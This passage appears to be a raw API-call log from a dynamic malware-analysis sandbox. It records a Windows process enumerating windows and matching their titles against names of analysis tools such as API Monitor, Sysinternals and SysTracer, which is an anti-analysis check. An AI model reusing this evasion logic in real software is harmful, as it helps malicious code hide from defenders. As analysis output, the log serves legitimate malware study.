lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.749] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.749] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.749] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.749] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.749] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: 
lpString1="0") returned="0" [0158.749] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.749] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.749] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.749] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.750] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.750] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.750] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.750] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.750] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="66012") returned 5 [0158.750] lstrcpyA (in: lpString1=0x430400, lpString2="66012" | out: lpString1="66012") returned="66012" [0158.750] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.750] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.750] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.750] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.750] GetWindowTextA (in: hWnd=0x101dc, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.750] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.750] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.750] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.750] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="66012") returned 5 [0158.750] lstrcpyA (in: 
lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.750] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.751] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.751] GetClassNameA (in: hWnd=0x101dc, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="ComboLBox") returned 9 [0158.751] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.751] lstrcpynA (in: lpString1=0x341200, lpString2="ComboLBox", iMaxLength=1024 | out: lpString1="ComboLBox") returned="ComboLBox" [0158.751] lstrcpyA (in: lpString1=0x430c00, lpString2="ComboLBox" | out: lpString1="ComboLBox") returned="ComboLBox" [0158.751] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="66012") returned 5 [0158.751] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.751] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.751] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.751] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.751] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.751] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.751] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.751] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.751] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.751] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.752] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.752] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: 
lpString1="0") returned="0" [0158.752] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.752] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.752] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.752] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.752] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.752] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.752] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.753] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.753] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.753] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.753] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.753] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.753] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.753] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.753] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="197036") returned 6 [0158.753] lstrcpyA (in: lpString1=0x430400, lpString2="197036" | out: lpString1="197036") returned="197036" [0158.753] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.753] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.753] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.753] lstrcpyA (in: lpString1=0x327e20, 
lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.753] GetWindowTextA (in: hWnd=0x301ac, lpString=0x3401e0, nMaxCount=1024 | out: lpString="OfficePowerManagerWindow") returned 24 [0158.753] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.753] lstrcpynA (in: lpString1=0x340df8, lpString2="OfficePowerManagerWindow", iMaxLength=1024 | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.754] lstrcpyA (in: lpString1=0x430800, lpString2="OfficePowerManagerWindow" | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.754] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="197036") returned 6 [0158.754] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.754] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.754] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.754] GetClassNameA (in: hWnd=0x301ac, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="OfficePowerManagerWindow") returned 24 [0158.754] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.754] lstrcpynA (in: lpString1=0x341200, lpString2="OfficePowerManagerWindow", iMaxLength=1024 | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.754] lstrcpyA (in: lpString1=0x430c00, lpString2="OfficePowerManagerWindow" | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.754] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="197036") returned 6 [0158.754] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.754] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.754] lstrcpyA (in: 
lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.754] strstr (_Str="OfficePowerManagerWindow", _SubStr="- main thread") returned 0x0 [0158.754] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.754] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.755] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.755] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.755] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.755] strstr (_Str="OfficePowerManagerWindow", _SubStr="API Monitor") returned 0x0 [0158.755] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.755] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.755] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.755] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.755] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.755] strstr (_Str="OfficePowerManagerWindow", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.755] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.755] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.755] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.755] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.756] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.756] strstr (_Str="OfficePowerManagerWindow", _SubStr="sysinternals") returned 0x0 [0158.756] wsprintfA (in: 
param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.756] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.756] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.756] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.756] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="328092") returned 6 [0158.756] lstrcpyA (in: lpString1=0x430400, lpString2="328092" | out: lpString1="328092") returned="328092" [0158.756] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.756] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.756] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.756] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.756] GetWindowTextA (in: hWnd=0x5019c, lpString=0x340df8, nMaxCount=1024 | out: lpString="Microsoft Office Sync Process") returned 29 [0158.756] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.756] lstrcpynA (in: lpString1=0x3401e0, lpString2="Microsoft Office Sync Process", iMaxLength=1024 | out: lpString1="Microsoft Office Sync Process") returned="Microsoft Office Sync Process" [0158.756] lstrcpyA (in: lpString1=0x430800, lpString2="Microsoft Office Sync Process" | out: lpString1="Microsoft Office Sync Process") returned="Microsoft Office Sync Process" [0158.757] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="328092") returned 6 [0158.757] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.757] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.758] lstrcpyA (in: lpString1=0x327e20, 
lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.758] GetClassNameA (in: hWnd=0x5019c, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="Microsoft.Office15.MsoSync") returned 26 [0158.758] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.758] lstrcpynA (in: lpString1=0x341200, lpString2="Microsoft.Office15.MsoSync", iMaxLength=1024 | out: lpString1="Microsoft.Office15.MsoSync") returned="Microsoft.Office15.MsoSync" [0158.758] lstrcpyA (in: lpString1=0x430c00, lpString2="Microsoft.Office15.MsoSync" | out: lpString1="Microsoft.Office15.MsoSync") returned="Microsoft.Office15.MsoSync" [0158.758] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="328092") returned 6 [0158.758] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.758] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.758] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.758] strstr (_Str="Microsoft Office Sync Process", _SubStr="- main thread") returned 0x0 [0158.758] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.758] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.758] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.759] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.759] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.759] strstr (_Str="Microsoft Office Sync Process", _SubStr="API Monitor") returned 0x0 [0158.759] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.759] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.759] lstrcpyA (in: 
lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.759] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.759] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.759] strstr (_Str="Microsoft Office Sync Process", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.759] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.759] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.759] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.759] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.759] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.759] strstr (_Str="Microsoft Office Sync Process", _SubStr="sysinternals") returned 0x0 [0158.759] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.760] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.760] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.760] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.760] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65940") returned 5 [0158.760] lstrcpyA (in: lpString1=0x430400, lpString2="65940" | out: lpString1="65940") returned="65940" [0158.760] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.760] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.760] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.760] lstrcpyA (in: lpString1=0x327e20, 
lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.760] GetWindowTextA (in: hWnd=0x10194, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Say Convenience") returned 15 [0158.760] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.760] lstrcpynA (in: lpString1=0x340df8, lpString2="Say Convenience", iMaxLength=1024 | out: lpString1="Say Convenience") returned="Say Convenience" [0158.760] lstrcpyA (in: lpString1=0x430800, lpString2="Say Convenience" | out: lpString1="Say Convenience") returned="Say Convenience" [0158.760] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65940") returned 5 [0158.761] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.761] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.761] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.761] GetClassNameA (in: hWnd=0x10194, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Sayconvenienceapp") returned 17 [0158.761] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.761] lstrcpynA (in: lpString1=0x341200, lpString2="Sayconvenienceapp", iMaxLength=1024 | out: lpString1="Sayconvenienceapp") returned="Sayconvenienceapp" [0158.761] lstrcpyA (in: lpString1=0x430c00, lpString2="Sayconvenienceapp" | out: lpString1="Sayconvenienceapp") returned="Sayconvenienceapp" [0158.761] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65940") returned 5 [0158.761] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.761] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.761] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.761] strstr (_Str="Say 
Convenience", _SubStr="- main thread") returned 0x0 [0158.761] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.761] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.761] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.762] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.762] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.762] strstr (_Str="Say Convenience", _SubStr="API Monitor") returned 0x0 [0158.762] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.762] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.762] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.762] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.762] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.762] strstr (_Str="Say Convenience", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.762] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.762] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.762] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.762] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.762] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.762] strstr (_Str="Say Convenience", _SubStr="sysinternals") returned 0x0 [0158.763] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.763] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") 
returned="0" [0158.763] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.763] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.763] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65936") returned 5 [0158.763] lstrcpyA (in: lpString1=0x430400, lpString2="65936" | out: lpString1="65936") returned="65936" [0158.763] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.763] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.763] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.763] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.763] GetWindowTextA (in: hWnd=0x10190, lpString=0x340df8, nMaxCount=1024 | out: lpString="Puzzle Fcc Tuesday") returned 18 [0158.763] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.763] lstrcpynA (in: lpString1=0x3401e0, lpString2="Puzzle Fcc Tuesday", iMaxLength=1024 | out: lpString1="Puzzle Fcc Tuesday") returned="Puzzle Fcc Tuesday" [0158.763] lstrcpyA (in: lpString1=0x430800, lpString2="Puzzle Fcc Tuesday" | out: lpString1="Puzzle Fcc Tuesday") returned="Puzzle Fcc Tuesday" [0158.763] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65936") returned 5 [0158.764] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.764] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.764] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.764] GetClassNameA (in: hWnd=0x10190, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="puzzle_fcc_Tuesday_cls") returned 22 
[0158.764] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.764] lstrcpynA (in: lpString1=0x341200, lpString2="puzzle_fcc_Tuesday_cls", iMaxLength=1024 | out: lpString1="puzzle_fcc_Tuesday_cls") returned="puzzle_fcc_Tuesday_cls" [0158.764] lstrcpyA (in: lpString1=0x430c00, lpString2="puzzle_fcc_Tuesday_cls" | out: lpString1="puzzle_fcc_Tuesday_cls") returned="puzzle_fcc_Tuesday_cls" [0158.764] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65936") returned 5 [0158.764] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.764] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.764] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.764] strstr (_Str="Puzzle Fcc Tuesday", _SubStr="- main thread") returned 0x0 [0158.764] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.764] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.764] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.765] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.765] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.765] strstr (_Str="Puzzle Fcc Tuesday", _SubStr="API Monitor") returned 0x0 [0158.765] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.765] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.765] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.765] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.765] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") 
returned="strstr" [0158.765] strstr (_Str="Puzzle Fcc Tuesday", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.765] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.765] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.765] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.765] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.765] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.765] strstr (_Str="Puzzle Fcc Tuesday", _SubStr="sysinternals") returned 0x0 [0158.766] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.766] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.766] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.766] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.766] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65932") returned 5 [0158.766] lstrcpyA (in: lpString1=0x430400, lpString2="65932" | out: lpString1="65932") returned="65932" [0158.766] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.766] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.766] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.766] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.766] GetWindowTextA (in: hWnd=0x1018c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Objectives Bailey Audit") returned 23 [0158.766] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.766] 
lstrcpynA (in: lpString1=0x340df8, lpString2="Objectives Bailey Audit", iMaxLength=1024 | out: lpString1="Objectives Bailey Audit") returned="Objectives Bailey Audit" [0158.766] lstrcpyA (in: lpString1=0x430800, lpString2="Objectives Bailey Audit" | out: lpString1="Objectives Bailey Audit") returned="Objectives Bailey Audit" [0158.767] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.767] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.767] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.767] GetClassNameA (in: hWnd=0x1018c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="objectivesbaileyaudit") returned 21 [0158.767] lstrcpyA (in: lpString1=0x430c00, lpString2="objectivesbaileyaudit" | out: lpString1="objectivesbaileyaudit") returned="objectivesbaileyaudit" [0158.767] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.767] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.767] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.767] strstr (_Str="Objectives Bailey Audit", _SubStr="- main thread") returned 0x0 [0158.767] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.767] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.767] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.767] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.767] strstr (_Str="Objectives Bailey Audit", _SubStr="API Monitor") returned 0x0 [0158.768] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.768] lstrcpyA (in: 
